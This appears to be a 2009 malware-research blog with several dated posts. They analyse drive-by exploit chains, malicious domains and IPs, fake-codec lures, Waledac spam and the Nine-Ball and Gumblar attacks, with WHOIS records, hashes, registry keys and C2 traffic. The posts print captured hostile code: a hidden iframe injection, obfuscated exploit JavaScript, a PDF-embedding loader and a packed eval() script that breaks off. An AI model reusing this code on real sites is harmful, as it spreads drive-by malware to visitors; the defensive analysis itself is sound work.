Sunday, July 26, 2009

91.212.198.37 Badness

IP/Domain Analysis

IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.

inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered

organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered

The IP 91.212.198.37 currently maps to the following domains.

• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn

The domain delzzerro.cn was registered on 17 July 2009.

Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17

The domain updatedate.cn was registered on 8 July 2009.

Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51

The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.

https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

www.delzzerro.cn Analysis

The HTTP request for www.delzzerro.cn returns and iframe and script redirect.

<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>

http://www.delzzerro.cn/pic/p2.php

The request for p2.php returns a PDF file.

GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf

36.pdf

File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9

The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://www.delzzerro.cn/pic/vq.png

The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

http://delzzerro.cn/pic/uzp.php

The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.

GET /pic/uzp.php
Host: delzzerro.cn

HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

http://91.212.198.37 Analysis

The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.

<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>

http://91.212.198.37/img/p2.php

The request for p2.php returns a PDF file.

GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37

HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf


119.pdf


File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9

The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.

• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927

http://91.212.198.37/img/vw.png

The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).

updatedate.cn/img/uzt.php

The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.

GET /img/uzt.php
Host: updatedate.cn

HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream

Malware Analysis

installb.exe

The malware installb.exe creates:

• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.

File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE

ThreatExpert
VirusTotal (4/41 current detection)

The malware installb.exe creates the following files:

C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe

File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9

C:\WINDOWS\system32\braviax.exe

File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD

VirusTotal (17/41 current detection)

C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)

C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys

File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741

VirusTotal (20/38 current detection)

C:\WINDOWS\system32\Wbem\proquota.exe

File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7

ThreatExpert
VirusTotal (5/41 current detection)

proquota.exe (PWS:Win32/Daurso)

The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).

POST /ptf/receiver/online HTTP/1.1
Host: squatead.com

The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.

POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg


Trojan.Virantix.C


The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.

Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20

Home Antivirus 2010 installer download.

GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2


GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";

The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.

File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E

ThreatExpert

The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.

GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1

The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.

Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003


Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20



An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.



The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:

*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com

GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com

The iejwn download creates c:\alurm.exe.

File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846

ThreatExpert

GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com

GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com

Tuesday, July 21, 2009

Erin Andrews Peepshow Gone Bad?

Fox News and other media outlets are reporting ESPN sportscaster hottie Erin Andrews was a victim of a severe invasion of privacy. Per Fox News, "Sexy ESPN sportscaster Erin Andrews was the target of a peephole pervert who surreptitiously shot a video of her walking around her hotel room naked -- and posted it on the Internet."

So what happens next? Tons of people search for the video before it is pulled by authorities and cyber criminals race to put up rogue exploit sites tied to common internet searches. As an example, the Google search for "Erin Andrews video nude" results in a hit for http://digg.com/celebrity/Naked_Erin_Andrews_SEX_TAPE_online_free.

The digg.com link had comments with hyperlinks to the following sites (note: the sites seem to consistently change)

http://video.report-cnn.com/Erin_Andrews_Peephole_Video (7/20/09)
http://sexy-top-news.com/show.php?id=Erin_Andrews (7/21/09)
http://vsj-news.com/video.php?vid=erin_andrews_peephole_video (7/21/09)



So lets follow the links to see the video :)

video.report-cnn.com (72.232.116.51)

Wow, CNN Video has the video!



All I need to do is download this Live Video Player!



MediaPlayer.exe seems legitimate.



No movie :( - what happened???

The file MediaPlayer.exe was downloaded from simplexdoom.com (91.214.45.73).

GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

File: MediaPlayer.exe
Size: 86715
MD5: 9D05428AE376A369798B126358B74150

Per ThreatExpert, MediaPlayer.exe installs several Alueron malware components. Per CA, "Alueron is a family of trojans with a variety of components that can download and execute arbitrary files, hijack the browser to display fake web pages, and report affected user's queries performed with popular search engines."

During analysis, the Alueron malware made the following C2 connections.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Let's try again, it has to be out there.

vsj-news.com (174.36.240.140)

VSJ News has to have the video. All I need is a Flash video codec plugin!



FlashCodecPlugin.exe looks good!



No movie again :(

The file FlashCodecPlugin.exe was downloaded from bigdron.com (91.214.45.73).

GET http:///bigdron.com/download/6936413148673d3d4ae1782e20090701/FlashCodecPlugin.exe
Referer: http://vsj-news.com/video.php?vid=erin_andrews_peephole_video

File: FlashCodecPlugin.exe
Size: 88514
MD5: 87CFCC91FB9934E55D3C969997D2BDC1

Per ThreatExpert, FlashCodecPlugin.exe also installs several Alueron malware components.

The FlashCodecPlugin.exe Alueron malware also connects to the same C2 sites.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Well, so much for the video. Let's examine some of the domains and IP addresses associated with the Alueron malware.

Domain/IP Analysis

report-cnn.com [hosts fake video requiring codec] currently resolves to 72.232.116.51 (AS22576, Layered Technologies, US). Several other suspect domains currently resolve to 72.232.116.51:

bestcasinochat.com
bestcasinogroup.com
bestworldwidecasino.com
casinogametime.net
cavers.net
celeb-sextapes.info
chudnoj.com
darkblog.org
eblogic.com
extraspray.com
fashionclubcasino.net
ffssa.com
finadvisenow.com
finquotenow.com
flplace.com
freepornsearcher.net
freesexsearcher.net
inacall.com
kittyclubcasino.com
lenma.com
mediaplayer.4upd.com
medicalc.net
mifomatic.com
mortagequotenow.com
oops-boobs.com
pornomixer.ru
report-cnn.com
rosem.biz
sexy-babes-zone.com
sleepingbabe.info
smut-xxx.com
totalautoblog.com
truetrick.net
video.report-cnn.com
webartcreative.com
www.chudnoj.com
www.free-incest-movies.net
www.pornomixer.ru
www.sleepingbabe.info
www.xesdn.ru
x-light.info
xesdn.ru

simplexdoom.com [fake codec malware download site] currently resolves to 91.214.45.73 (AS44042, eSolutions, Belize). Several other suspect domains currently resolve to 91.214.45.73:

*.allincorx.com
*.bigdron.com
*.cikaredo.com
*.operationelx.com
*.oxxadox.com
*.paxxtiger.com
*.rstdeals.com
*.simplexdoom.com
allincorx.com
bigdron.com
cikaredo.com
detailedus.com
ns1.allincorx.com
ns1.bigdron.com
ns1.cikaredo.com
ns1.operationelx.com
ns1.oxxadox.com
ns1.paxxtiger.com
ns1.rstdeals.com
ns1.simplexdoom.com
ns2.allincorx.com
ns2.bigdron.com
ns2.cikaredo.com
ns2.operationelx.com
ns2.oxxadox.com
ns2.paxxtiger.com
ns2.rstdeals.com
ns2.simplexdoom.com
operationelx.com
oxxadox.com
paxxtiger.com
rstdeals.com
simplexdoom.com

vsj-news.com [hosts fake video requiring codec] currently resolves to 174.36.240.140 (AS36351, SOFTLAYER Technologies Inc., US). Several other suspect domains currently resolve to 174.36.240.140:

24kadra.net
avado.ru
bestdom2.ru
domivo4ka.com
gliant.com
kontaktzlo.ru
kozenko.ru
kurortnik.com.ua
livedom2.ru
simpletv.net
softlayer.org.ru
svet999.ru
vsj-news.com
wmsoft.ru
www.24kadra.net
www.bestdom2.ru
www.kurortnik.com.ua
www.livedom2.ru
www.simpletv.net
www.svet999.ru
ylati.ru

sexy-top-news.com [listed at digg.com, but down at the time of analysis] currently resolves to 195.88.191.21 (AS22576, Bigness Group Ltd., Russia). Several other suspect domains currently resolve to 195.88.191.21:

empire-of-tops.com
sexy-top-news.com
shocking-stars.net
video-trailers.net

Bottom line: social engineering tactics surrounding current events and pornographic material continue to be a preferred TTP for cyber criminals. There is no need to come up with exploit code, when users continue to "choose" to install malware themselves.

Wednesday, July 8, 2009

Waledac - July 4th Wave

Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:

fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com

The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:

112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23

sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.

Malware Analysis

File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E

The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe

The following are samples of initial connections to various Waledac controllers.

POST /rbbcrx.png
Host: 119.77.219.219

POST /lbohwj.png
Host: 98.25.97.68

POST / HTTP/1.1
Host: 93.100.114.158

POST /xdryoc.htm
Host: 134.155.241.188

POST /mzrbflwkczf.png
Host: 93.100.114.158

Friday, June 19, 2009

Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php

Exploit Analysis


http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)

The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.

The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){
}
if (Qqz8W8MiQQlAc){
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);


The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.

ThreatExpert
VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The below table lists domain registration data for the domains hosted at 91.212.65.133:

Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...

Thursday, June 11, 2009

Gumblar Analysis

So it seems Gumblar is the latest threat to receive continual media hype. It was nice to see Symantec's opinion that this is just another day in the life of the web. Recent "threats" like Conficker and Gumblar seem to benefit security vendors and consultants who feed the hype for business purposes. The term Gumblar is an adopted term that describes a recent web-based drive-by attack. The attack follows the standard web-based drive-by attack TTP:

  1. The bad guys use stolen FTP credentials or SQL injection to inject iframe redirects into legitimate websites.
  2. The iframes redirect to sites that host exploit code targteted against web browsers, browser plug-ins and 3rd party applications (IE, FF, Adobe Reader, WinZip, etc.)
  3. The exploits result in malware payload. The malware typically downloads additional for-profit malware (spambots, infostealers, rogue security products, etc.)
  4. Credentials exfiltrated by infostealers (like FTP) are used to compromise additional web servers back in step #1.
At one point in the attack (~May 2009), the Gumblar exploit site was gumblar.cn (hence the adopted name). The domain martuz.cn was later used. The activity began much further back, but the attack summary was put togther and publicized more recently. The following "Gumblar" analysis goes back to April 17, 2009 before gumbar.cn was utilized.

Gumbar Exploit Analysis

The USDA Forest Service website (http://www.fs.fed.us) was a vicitm of an iframe injection. The compromised site contained an iframe to lotmachinesguide.cn (94.247.3.150, Latvia).

<iframe src="http://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The lotmachinesguide.cn/in.cgi?income56 request returned a HTTP Location redirect to liteautogreatest.cn (94.247.3.151, Latvia). The http://liteautogreatest.cn/index.php request returned obfuscated JavaScript and references to Adobe Reader and Flash files that contain exploit code.

http://liteautogreatest.cn/cache/readme.pdf
http://liteautogreatest.cn/cache/flash.swf

The first 2 sections of exploit code target the Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041). The readme.pdf file contains code designed to exploit the Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19) and a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The flash.swf file exploits an Adobe Flash vulnerability (not sure specific one).The exploit payloads were GET requests to litehitscar.cn (94.247.3.151, Latvia) that returned load.exe.

http://litehitscar.cn/load.php?id=1
http://litehitscar.cn/load.php?id=4
http://litehitscar.cn/load.php?id=5

http://liteautogreatest.cn/index.php Code

<script>eval(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('1h(1i(\'%E%J%l%o%h%k%p%l%0%V%l%E%10%h%L%B%E%w%1%2%d%c%I%d%c%g%E%p%9%1%j%P%D%9%11%j%M%P%w%0%t%0%15%F%0%z%q%s%A%A%G%w%D%H%0%t%0%x%x%u%0%j%P%D%9%11%j%M%P%w%0%1g%t%0%15%13%u%0%j%P%D%9%11%j%M%P%w%y%y%2%d%c%g%I%d%c%g%g%z%q%s%A%A%G%w%D%H%0%t%0%X%h%9%k%l%s%r%E%9%p%O%B%q%i%9%B%p%C%8%1%13%A%0%y%0%j%P%D%9%11%j%M%P%w%2%u%d%c%g%g%z%i%9%0%C%H%w%B%12%G%q%C%Z%0%t%0%l%8%L%0%19%O%i%s%8%1%2%u%d%c%g%g%C%H%w%B%12%G%q%C%Z%r%v%9%o%0%t%0%x%9%8%v%W%n%n%x%0%y%0%z%q%s%A%A%G%w%D%H%0%y%0%x%W%6%6%x%0%y%0%f%R%a%7%1%2%9%1%e%p%2%e%s%5%9%1%a%i%7%O%e%4%0%2%10%b%k%4%m%e%a%2%8%1%v%b%e%e%f%r%9%8%j%m%i%o%8%1%n%5%3%a%3%b%3%6%4%3%6%7%3%6%2%3%6%e%3%6%1%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%D%7%J%1%4%a%h%e%7%m%2%1%a%p%1%p%a%a%a%Y%a%2%0%7%5%a%1c%a%1%5%4%V%4%a%j%7%4%9%4%5%8%a%1%v%2%7%v%5%4%f%r%9%8%j%m%i%o%8%1%n%a%3%b%3%5%3%6%7%3%6%1%3%6%4%3%6%e%3%6%2%n%k%s%F%0%f%f%2%0%y%0%x%6%6%x%0%y%0%f%O%5%2%v%e%p%2%8%a%7%1%9%1%8%2%e%4%v%5%b%7%5%r%2%b%b%b%C%b%5%4%b%m%4%e%5%m%1%4%f%r%9%8%j%m%i%o%8%1%n%b%3%6%4%3%6%e%3%6%1%3%a%3%6%2%3%5%3%6%7%n%k%s%F%0%f%f%2%0%y%0%x%n%b%15%n%17%x%u%d%c%d%c%g%g%k%E%1%C%H%w%B%12%G%q%C%Z%r%q%8%k%s%q%h%0%t%t%0%A%1m%2%d%c%g%g%I%d%c%g%g%g%14%9%8%i%Y%u%d%c%g%g%K%d%c%d%c%g%g%C%H%w%B%12%G%q%C%Z%0%t%0%f%f%u%d%c%g%K%d%c%d%c%g%9%8%h%J%9%l%0%z%q%s%A%A%G%w%D%H%u%d%c%K%d%c%d%c%E%J%l%o%h%k%p%l%0%m%9%o%1a%O%M%N%1b%k%1%J%9%m%2%d%c%I%d%c%g%z%i%9%0%z%q%s%A%A%G%w%D%H%0%t%0%V%l%E%10%h%L%B%E%w%1%2%u%d%c%g%k%E%0%1%z%q%s%A%A%G%w%D%H%0%t%t%0%f%1f%f%2%0%9%8%h%J%9%l%u%d%c%d%c%g%h%9%M%d%c%g%I%d%c%g%g%z%i%9%0%j%N%B%U%T%S%Q%l%0%t%0%l%8%L%0%18%o%h%k%z%8%Z%D%14%1d%8%o%h%1%f%v%e%5%l%1%e%a%j%a%z%4%1%L%7%b%a%7%r%e%5%5%a%X%4%5%7%7%l%5%5%7%2%i%4%1%e%j%7%a%5%b%7%v%b%b%7%q%2%b%p%a%7%4%h%4%2%0%5%2%1l%7%1%4%5%k%4%a%8%5%5%L%7%8%a%4%7%9%1%4%1%7%0%a%7%e%2%B%4%a%p%2%l%7%b%4%e%h%4%b%9%7%5%4%p%4%m%5%2%4%r%5%b%7%5%17%a%b%2%f%r%9%8%j%m%i%o%8%1%n%b%3%6%e%3%